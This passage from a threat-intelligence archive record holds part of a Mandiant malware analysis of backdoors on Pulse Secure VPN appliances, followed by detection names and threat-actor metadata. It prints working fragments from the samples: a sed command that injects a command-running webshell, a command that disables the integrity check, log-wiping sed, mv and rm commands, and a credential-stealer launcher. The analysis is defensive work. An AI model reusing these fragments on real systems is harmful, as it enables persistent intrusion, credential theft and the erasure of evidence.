to be executed and the previous serverid value, along with a form submission button\r\nnamed Run. Upon submission, the webshell will execute the passed command on the victim host's command line and\r\ndisplay the results to the attacker before exiting. If no cmd value was extracted, the webshell will simply output\r\na \u003c/pre\u003e HTML tag.\r\nPULSECHECK\r\nThe file secid_canceltoken.cgi (SHA256: a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1) is a\r\nwebshell written in Perl that enables arbitrary command execution. With a properly formatted request, the script will execute\r\nwebshell code. 
Otherwise, the legitimate welcome page of the Pulse Secure VPN software is presumably invoked.\r\nThe script checks for web requests using the HTTP POST method and, if found, will further check the HTTP request\r\nheaders for the CGI environment variable HTTP_X_KEY. If this header matches a backdoor key, then the malware will\r\noutput the result of the command sent in the variable HTTP_X_CMD. This data is RC4 encrypted and base64-encoded. The\r\npassphrase to decrypt is sent in the environment variable HTTP_X_CNT. The webshell sets the content type to Content-type:text/html and prints the command output. Following this, the script exits.\r\nQUIETPULSE\r\nThe file dsserver (SHA256: 9f6ac39707822d243445e30d27b8404466aa69c61119d5308785bf4a464a9ebd) is a legitimate\r\nPerl script with malicious modifications to fork the child process /home/bin/dshelper. The dshelper script does not exist on a\r\nclean PulseSecure installation; this file is described below as the QUIETPULSE Utility Script.\r\nQUIETPULSE Utility Script\r\nThe file dshelper (SHA256: c774eca633136de35c9d2cd339a3b5d29f00f761657ea2aa438de4f33e4bbba4) is a shell script\r\ninvoked by a malicious version of dsserver that primarily functions as a utility script responsible for copying files and\r\nexecuting commands. Like the ATRIUM patcher, this script accesses /tmp/data, a path which is used during a system\r\nupgrade. This file is therefore, like the ATRIUM patcher, used by the attacker to maintain persistence. The script is set to\r\nexecute in a loop where four main checks are executed every two minutes. 
The checks are as follows:\r\nCheck 1\r\nIf /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi exists and is non-empty then execute:\r\ngrep -c -s 'system($depara)' /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\r\nIt checks if the file has the contents system($depara). If the file does not contain this content, then retrieve the first line of\r\nthe file by executing:\r\nsed -n 1p /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\r\nThen copy a file via:\r\ncp /home/webserver/htdocs/dana-na/auth/compcheckjava.cgi /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\r\nThen replace the copy’s first line with the one retrieved from the sed above via:\r\nsed -i 1c\"\u003cvaries\u003e\" /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\r\nCheck 2\r\nIf /tmp/data/root/home/bin/ exists as a directory, then check if the file /tmp/data/root/home/bin/dshelper does not exist. If it\r\ndoes not exist, then place it there by copying a file via:\r\ncp -p /home/bin/dshelper /tmp/data/root/home/bin/\r\nCheck 3\r\nIf /tmp/data/root/home/bin/dsserver exists and is non-empty then execute the following to check if the file does not contain\r\nthe string exec(\"/home/bin/dshelper\"):\r\ngrep -c -s 'exec(\"/home/bin/dshelper\")' /tmp/data/root/home/bin/dsserver\r\nIf it doesn't then execute to insert the line:\r\nsed -i 's/for (;;)/my $monpid = fork();\\nif ($monpid == 0) {\\nexec(\\\"\\/home\\/bin\\/dshelper\\\");\\n}\\n\u0026/g'\r\n/tmp/data/root/home/bin/dsserver\r\nCheck 4\r\nIf the file /tmp/data/root/home/bin/check_integrity.sh exists and is non-empty, then check if the file contains the string exit\r\n1 by executing:\r\ngrep -c -s 'exit 1' /tmp/data/root/home/bin/check_integrity.sh\r\nIf the file does contain this content, then execute the following to switch the content to exit 0:\r\nsed -i 's/exit 1/exit 0/g' 
/tmp/data/root/home/bin/check_integrity.sh\r\nPULSEJUMP\r\nThe file with SHA256: 7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a is a system information\r\nand credential harvesting Perl script. The sample writes information from multiple sources to the\r\nfile /tmp/dsactiveuser.statementcounters in append mode.\r\nThe sample begins by retrieving all auth servers via the API AuthAdmin::getAllAuthServers and logs the results. Next, the\r\nsample logs all roles via the API DSRole::GeneralAdmin::getRoles and writes the values to the file. The sample may also\r\nretrieve and log additional information depending on the device configuration.\r\nHARDPULSE\r\nThe file compcheckjava.cgi (SHA256: 1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc) has the\r\nability to read and write arbitrary files and may execute arbitrary commands depending on the implementation of a particular\r\nlibrary function.\r\nThe sample responds to HTTP GETs and PUTs. The GET path is not relevant, but the PUT path first checks if the incoming\r\nrequest's checkcode POST param is equal to a hardcoded passcode. If this check passes, the sample inspects the\r\nparam hashid to determine if it's non-empty. If non-empty, the sample displays a prompt to the user that includes hardware\r\ninformation and then base64 decodes the param hashid and checks it against pulsesecure. If this matches, a recoveryToken is\r\ngenerated which is the MD5 hash of 16 random bytes, with the resulting hash truncated to 8 characters. This token is then\r\ndisplayed to the user via the URL https://ive-host/dana-na/auth/recover[.]cgi?token=\u003cvaries\u003e and the sample exits. 
If this\r\ncheck did not match then the sample passes the base64 decoded data to a routine DSSafe::psystem, which may execute shell\r\ncommands; however, this implementation is not provided and is speculation.\r\nIf the param hashid is empty the sample instead checks that the param m is non-empty. If so, it's matched against get and put,\r\nwhich will read/write arbitrary files on the host, respectively.\r\nATRIUM\r\nThe file compcheckresult.cgi (SHA256: f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90) is a\r\nwebshell capable of arbitrary command execution. The sample has malicious logic inserted at the end of legitimate logic.\r\nThe malicious logic inspects all requests of any type looking for the HTTP query parameter id. If this query parameter\r\nexists, the sample executes it verbatim using the system API. The sample does not encode or obfuscate the command in\r\nany way. If the query parameter is not found in the request, then the original legitimate logic is invoked.\r\nPersistence Patcher\r\nThe file DSUpgrade.pm (SHA256: 224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450) is a\r\npatcher utility script responsible for persisting webshells across a system upgrade. We’ve observed variants of this utility\r\ntargeting the persistence of multiple webshell families, notably ATRIUM, STEADYPULSE, and PULSECHECK. Like\r\nprevious patchers, this sample uses sed to insert malicious logic. The attacker likely chose DSUpgrade.pm to host their patch\r\nlogic as it is a core file in the system upgrade procedure, ensuring the patch is applied during updates. The patcher modifies content\r\nin /tmp/data as this directory holds the extracted upgrade image the newly upgraded system will boot into. 
This results in a\r\npersistence mechanism which allows the attacker to maintain access to the system across updates.\r\nmy $cmd_x=\"sed -i '/echo_console \\\"Saving package\\\"/i(    sed -i \\\\\\'/main();\\\\\\$/cif(CGI::param(\\\\\\\\\\\"id\\\\\\\\\\\")){        print\r\n\\\\\\\\\\\"Cache-Control: no-cache\\\\\\\\\\\\\\\\n\\\\\\\\\\\";        print \\\\\\\\\\\"Content-type: text/html\\\\\\\\\\\\\\\\n\\\\\\\\\\\\\\\\n\\\\\\\\\\\";        my\r\n\\\\\\\\\\$na=CGI::param(\\\\\\\\\\\"id\\\\\\\\\\\");        system(\\\\\\\\\\\"\\\\\\\\\\$na\\\\\\\");    } else{        \u0026main();    }\\\\\\' /tmp/data/root$cgi_p;    cp -f\r\n/home/perl/DSUpgrade.pm /tmp/data/root/home/perl;    cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)'/pkg/do-install\";\r\nThe patcher also performs additional shell commands for unpacking a compressed package:\r\nsystem(\"/bin/mount -o remount,rw /dev/root /\");system(\"/bin/tar\", \"-xzf\", \"/tmp/new-pack.tgz\", \"-C\",\r\n\"/tmp\",\"./installer\");system(\"cp -f /tmp/installer/do-install /pkg/\");system(\"cp -f /tmp/installer/VERSION /pkg/\");system(\"cp\r\n-f /tmp/installer/sysboot-shlib /pkg/\");system(\"cp -f /tmp/installer/losetup /pkg/\");\r\nPACEMAKER\r\nThe file memread (SHA256: 68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2) is a credential\r\nstealer. The sample has the usage information:\r\nUsage: memread [-t time(minute)] [-m size(MB)] [-s sleep_interval(second)]\r\nThe sample starts by setting an alarm that kills the application after a configurable number of minutes, 14 by default. It then\r\nenters a loop which reads /proc/ entries every 2 seconds looking for a target application, this interval is also configurable.\r\nThe target is found by opening /proc/\u003cprocess_name\u003e/cmdline for each entry in the folder and then reading this file looking\r\nfor the string dswsd within the command line. 
Once found, the target application's /proc/\u003ctarget_pid\u003e/mem is opened, the\r\nprocess is attached to with PTRACE, then memory is read in chunks of up to 512 bytes. For each chunk, the string 20 30\r\n20 0A 00 ( 0 \\n) is searched for as a needle. If found, the sample splits the data on the first space, then on a dash (-). Two dashes are\r\nexpected to be found, and these are immediately converted into hex numbers, example form: -\u003cnumber\u003e. If the second\r\nnumber minus the first is \u003e 8191, the sample reads the data starting at the file offset of the first number, up to a size specified\r\nby the second number minus the first number.\r\nOnce the sample has read the process memory and found all memory data of interest, it detaches PTRACE and\r\nbegins scanning the copied data. The sample tries to locate a sequence of 'flags' in memory one by one to\r\nlocate what seems to be information the attacker wishes to steal. This information is not known, nor is its structure. The\r\nsequences scanned for have start and end markers which, in the order scanned for, are:\r\nUSER_START_FLAG: 3C 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 05 00\r\nUSER_END_FLAG: 3C 2F 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 00\r\nPASSWORD_START_FLAG: 3C 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00\r\nPASSWORD_END_FLAG: 3C 2F 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00\r\nAUTHNUM_START_FLAG: 3C 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00\r\nAUTHNUM_END_FLAG: 3C 2F 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00\r\nIf all these sequences are found, the data between the start and end is extracted and eventually formatted and written to the\r\nfile /tmp/dsserver-check.statementcounters. 
The approximate format of this data is:\r\nName:\u003cusername\u003e || Pwd:\u003cpassword\u003e || AuthNum:\u003cauthnumber\u003e\\n\r\nThe sample replaces the following URL encoded values with their ASCII representation for the password:\r\n\u0026amp; -\u003e \u0026\r\n\u0026lt; -\u003e \u003c\r\n\u0026gt; -\u003e \u003e\r\nPACEMAKER Launcher Utility\r\nAs part of our investigation into PACEMAKER we were able to retrieve a simple bash script responsible for launching the\r\ncredential stealer. The launcher script\r\n(SHA256: 4c5555955b2e6dc55f52b0c1a3326f3d07b325b112060329c503b294208960ec) launches PACEMAKER from a\r\nhardcoded path with options specifying a 16MB memory read size and a memory scan interval of 2 seconds, with a variable\r\nself-kill time.\r\n#!/bin/bash\r\n/home/bin/memread -t $1 -m 16 -s 2 \u0026\r\nTHINBLOOD Log Wiper Utility\r\nThe file dsclslog with SHA256 88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079 is a log wiper\r\nutility. The sample provides the usage information:\r\nUsage: dsclslog -f [events|access] -r [Regex1,Regex2,Regex3,...]\r\nThe -f flag specifies whether the file log.events.vc0 or log.access.vc0 within the directory /home/runtime/logs should be modified.\r\nTo perform its log cleaning operations the sample first makes two copies of whichever log file was chosen, but\r\nuses .vc1 and .vc2 as the extensions for the new files. The file with the .vc1 extension is used to search for entries that match the given\r\nregex patterns, and the file with the .vc2 extension is used as a temporary file where the cleaned log is written. 
After both\r\nfiles have been generated and log cleaning is finished, the sample executes the following commands via the system API to overwrite the original\r\nlog with the cleaned version, then remove the intermediate file:\r\nmv /home/runtime/logs/log.\u003clogtype\u003e.vc2 /home/runtime/logs/log.\u003clogtype\u003e.vc0\r\nrm /home/runtime/logs/log.\u003clogtype\u003e.vc1\r\nTHINBLOOD LogWiper Utility Variant\r\nThe file clear_log.sh (SHA256: 1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9) is a BASH\r\nscript responsible for zeroing log lines that match a given regex pattern. The sample is similar to the\r\ncompiled THINBLOOD Log Wiper but edits logs in-place with sed rather than making temporary copies. The sed\r\ncommands used are:\r\nsed -i \"s/.\\x00[^\\x00]*\u003cregex_string\u003e[^\\x00]*\\x09.\\x00//g\" /data/runtime/logs/\u003clogfile\u003e\r\nsed -i \"s/\\x\u003chex_char\u003e\\x00[^\\x00]*$2[^\\x00]*\\x09\\x\u003chex_char\u003e\\x00//g\" /data/runtime/logs/\u003clogfile\u003e\r\nThe sample embeds the usage information:\r\nusage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]\r\nLOCKPICK\r\nThe file libcrypto.so (SHA256: 2610d0372e0e107053bc001d278ef71f08562e5610691f18b978123c499a74d8) is a shared\r\nobject containing cryptographic logic from openssl. The sample contains a modification to the routine bnrand_range that\r\nbreaks the security of the random numbers generated. There are three paths in this routine for generating a random big\r\nnumber within a given range. The first case is unmodified and generates a zeroed big number; the other two cases are\r\npatched so that a constant value overwrites the generated random value and always returns success. 
This breaks the random\r\nnumber generation by replacing it with a value the attacker knows in all cases.\r\nLOCKPICK Patcher\r\nThe file with the hash b990f79ce80c24625c97810cb8f161eafdcb10f1b8d9d538df4ca9be387c35e4 is a patcher utility\r\nresponsible for inserting the malicious logic known as LOCKPICK. The patcher starts by running sed on the integrity\r\nchecker script built into the appliance to insert an early exit routine. This is inserted by the command sed -i '12aexit 0'\r\n/home/bin/check_integrity.sh which, when applied, causes this script to exit without performing its intended checks. After this\r\nthe sample uses python file read/write APIs to insert long strings of assembly that represent the logic known as LOCKPICK.\r\nThis file is different from the other patchers we’ve identified in that it is python and specifically targets system integrity\r\nroutines.\r\nDetecting the Techniques\r\nThe following table contains specific FireEye product detection names for the malware families associated with the\r\nexploitation of Pulse Secure VPN devices.\r\nPlatform(s): Network Security, Email Security, Detection On Demand, Malware File Scanning, Malware File Storage Scanning\r\nDetection Names:\r\nFE_APT_Webshell_PL_HARDPULSE_1\r\nFEC_APT_Webshell_PL_HARDPULSE_1\r\nAPT.Webshell.PL.HARDPULSE\r\nFE_APT_Trojan_PL_PULSEJUMP_1\r\nFEC_APT_Trojan_PL_PULSEJUMP_1\r\nFE_Trojan_PL_Generic_1\r\nFE_APT_Trojan_PL_RADIALPULSE_1\r\nFEC_APT_Trojan_PL_RADIALPULSE_1\r\nFE_APT_Trojan_PL_RADIALPULSE_\r\nFE_APT_Trojan_Linux32_PACEMAKER_1\r\nFE_APT_Trojan_Linux_PACEMAKER_1\r\nFE_APT_Backdoor_Linux32_SLOWPULSE_1\r\nFE_APT_Backdoor_Linux32_SLOWPULSE_2\r\nFE_APT_Trojan_Linux32_S\r\nFE_APT_Webshell_PL_STEADYPULSE_1\r\nFEC_APT_Webshell_PL_STEADYPULSE_1\r\nAPT.Webshell.PL.STEADYPUL\r\nFE_APT_Trojan_Linux32_LOCKPICK_1\r\nFE_Webshell_PL_ATRIUM_1\r\n
FEC_Webshell_PL_ATRIUM_1\r\nFE_Trojan_SH_ATRIUM_1\r\nFE_APT_Webshell_PL_SLIGHTPULSE_1\r\nFEC_APT_Webshell_PL_SLIGHTPULSE_1\r\nAPT.Webshell.PL.SLIGHTPULSE\r\nFE_APT_Webshell_PL_PULSECHECK_1\r\nFEC_APT_Webshell_PL_PULSECHECK_1\r\nFE_APT_Tool_Linux32_THINBLOOD_1\r\nFE_APT_Tool_Linux_THINBLOOD_1\r\nFE_APT_Tool_SH_THINBLOOD_1\r\nFE_APT_Trojan_PL_QUIETPULSE_1\r\nFEC_APT_Trojan_PL_QUIETPULSE_1\r\nFE_Trojan_SH_Generic_2\r\nFEC_Trojan_SH\r\nSuspicious Pulse Secure HTTP request (IPS)\r\nPlatform(s): Endpoint Security\r\nReal-Time (IOC)\r\nSLOWPULSE (BACKDOOR)\r\nPACEMAKER (LAUNCHER)\r\nTHINBLOOD (UTILITY)\r\nPlatform(s): Helix\r\nVPN ANALYTICS [Abnormal Logon]\r\nEXPLOIT - SONICWALL ES [CVE-2021-20021 Attempt]\r\nEXPLOIT - SONICWALL\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID  Title \r\nA101-596  Malicious File Transfer - SLOWPULSE, Download, Variant #1 \r\nA101-597  Malicious File Transfer - SLOWPULSE, Download, Variant #2 \r\nA101-598  Malicious File Transfer - SLOWPULSE, Download, Variant #3 \r\nA101-599  Malicious File Transfer - SLOWPULSE, Download, Variant #4 \r\nA101-600  Malicious File Transfer - SLOWPULSE, Download, Variant #5 \r\nA101-601  Malicious File Transfer - SLOWPULSE, Download, Variant #6 \r\nA101-602  Malicious File Transfer - SLOWPULSE, Download, Variant #7 \r\nA101-604  Malicious File Transfer - Pulse Secure Vulnerability, Utility, Download, Variant #1 \r\nA101-605  Malicious File Transfer - RADIALPULSE, Download, Variant #1 \r\nA101-606  Malicious File Transfer - PULSEJUMP, Download, Variant #1 \r\nA101-607  Malicious File Transfer - HARDPULSE, Download, Variant #1 \r\nA101-608  Malicious File Transfer - SLIGHTPULSE, Download, Variant #1 \r\nA101-609  Malicious File Transfer - LOCKPICK, Patcher, Download, Variant #1 \r\nA101-610  Malicious File Transfer - LOCKPICK, 
Download, Variant #1 \r\nA101-611  Malicious File Transfer - ATRIUM, Patcher, Download, Variant #1 \r\nA101-612  Malicious File Transfer - PACEMAKER, Launcher, Download, Variant #1\r\nA101-613  Malicious File Transfer - PACEMAKER, Download, Variant #1 \r\nA101-614  Malicious File Transfer - QUIETPULSE Utility, Download, Variant #1 \r\nA101-615  Malicious File Transfer - QUIETPULSE, Download, Variant #1 \r\nA101-616  Malicious File Transfer - STEADYPULSE, Download, Variant #2 \r\nA101-617  Malicious File Transfer - STEADYPULSE, Download, Variant #1 \r\nA101-618  Malicious File Transfer - ATRIUM, Download, Variant #1 \r\nA101-619  Malicious File Transfer - THINBLOOD, Download, Variant #1 \r\nA101-620  Malicious File Transfer - THINBLOOD, Download, Variant #2 \r\nA101-621  Malicious File Transfer - PULSECHECK, Download, Variant #1 \r\nA101-622  Malicious File Transfer - PULSECHECK, Download, Variant #2 \r\nA104-757  Host CLI - QUIETPULSE Utility, Check, Variant #1 \r\nA104-758  Host CLI - QUIETPULSE Utility, Check, Variant #2 \r\nA104-759  Host CLI - QUIETPULSE Utility, Check, Variant #3 \r\nA104-760  Host CLI - QUIETPULSE Utility, Check, Variant #4 \r\nAcknowledgements\r\nMandiant would like to thank the Stroz Friedberg DFIR and Security Testing teams for their collaboration with the analysis\r\nand research. The team would also like to thank Joshua Villanueva, Regina Elwell, Jonathan Lepore, Dimiter Andonov, Josh\r\nTriplett, Jacob Thompson and Michael Dockry for their hard work in analysis and blog content.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"
	],
	"report_names": [
		"suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"
	],
	"threat_actors": [
		{
			"id": "7e75ee53-c4d3-4260-8106-ed7b61d35f02",
			"created_at": "2023-12-08T02:00:05.765868Z",
			"updated_at": "2026-04-10T02:00:03.497413Z",
			"deleted_at": null,
			"main_name": "UNC2630",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC2630",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "13bedce4-3115-4563-afd5-068e3930e68e",
			"created_at": "2023-01-06T13:46:38.623775Z",
			"updated_at": "2026-04-10T02:00:03.042652Z",
			"deleted_at": null,
			"main_name": "APT5",
			"aliases": [
				"KEYHOLE PANDA",
				"BRONZE FLEETWOOD",
				"TEMP.Bottle",
				"Mulberry Typhoon",
				"Poisoned Flight"
			],
			"source_name": "MISPGALAXY:APT5",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e44de7cd-80f0-4f0e-a348-33da1947fd25",
			"created_at": "2023-12-08T02:00:05.724516Z",
			"updated_at": "2026-04-10T02:00:03.489003Z",
			"deleted_at": null,
			"main_name": "UNC2717",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC2717",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6d69ef1b-b6f3-47e1-be5a-87ac0fd5ff55",
			"created_at": "2024-04-24T02:00:49.599348Z",
			"updated_at": "2026-04-10T02:00:05.303948Z",
			"deleted_at": null,
			"main_name": "APT5",
			"aliases": [
				"APT5",
				"Mulberry Typhoon",
				"BRONZE FLEETWOOD",
				"Keyhole Panda",
				"UNC2630"
			],
			"source_name": "MITRE:APT5",
			"tools": [
				"Tasklist",
				"PoisonIvy",
				"RAPIDPULSE",
				"PcShare",
				"Mimikatz",
				"SLOWPULSE",
				"SLIGHTPULSE",
				"Skeleton Key",
				"gh0st RAT",
				"PULSECHECK",
				"netstat"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "47a8f6c7-5b29-4892-8f47-1d46be71714f",
			"created_at": "2025-08-07T02:03:24.599925Z",
			"updated_at": "2026-04-10T02:00:03.720795Z",
			"deleted_at": null,
			"main_name": "BRONZE FLEETWOOD",
			"aliases": [
				"APT5 ",
				"DPD ",
				"Keyhole Panda ",
				"Mulberry Typhoon ",
				"Poisoned Flight ",
				"TG-2754 "
			],
			"source_name": "Secureworks:BRONZE FLEETWOOD",
			"tools": [
				"Binanen",
				"Comfoo",
				"Gh0st RAT",
				"Isastart",
				"Leouncia",
				"Marade",
				"OrcaRAT",
				"PCShare",
				"Protux",
				"Skeleton Key",
				"SlyPidgin",
				"VinSelf"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434155,
	"ts_updated_at": 1775792144,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2e1f557e18c735ef48576df8ad89e8d7f5f07be2.pdf",
		"text": "https://archive.orkl.eu/2e1f557e18c735ef48576df8ad89e8d7f5f07be2.txt",
		"img": "https://archive.orkl.eu/2e1f557e18c735ef48576df8ad89e8d7f5f07be2.jpg"
	}
}